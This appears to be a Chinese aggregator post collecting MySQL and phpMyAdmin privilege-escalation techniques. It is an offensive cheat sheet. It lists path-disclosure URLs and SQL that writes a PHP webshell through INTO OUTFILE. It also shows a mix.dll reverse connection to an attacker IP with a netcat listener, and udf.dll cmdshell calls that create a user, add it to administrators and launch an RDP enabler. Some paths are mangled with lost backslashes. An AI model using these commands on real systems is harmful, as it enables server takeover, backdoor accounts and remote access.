作者:En199010221 | 来源:互联网 | 2023-09-15 11:48
本文由编程笔记#小编为大家整理,主要介绍了Mysql+Phpmyadmin提权资料相关的知识,希望对你有一定的参考价值。
1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
hpmyadmin hemesdarkblue_orangelayout.inc.php
D:usrwwwhtmlphpMyAdmin
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
----end code---
2:mix.dll提权
D:/usr/www/html/mix.dll
mysql -h 目标ip -uroot -p
. c:mysql.txt
select Mixconnect('反弹ip','端口');
nc -vv -l -p 1983
3:udf.dll提权
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('c:3389.exe');
drop function cmdshell; 删除函数
select cmdshell('netstat -an');
load data infile "d:\www\gb\about\about.htm" into table tmp;
判断文件存不存在mysql的语句
点分享
点收藏
京公网安备 11010802041100号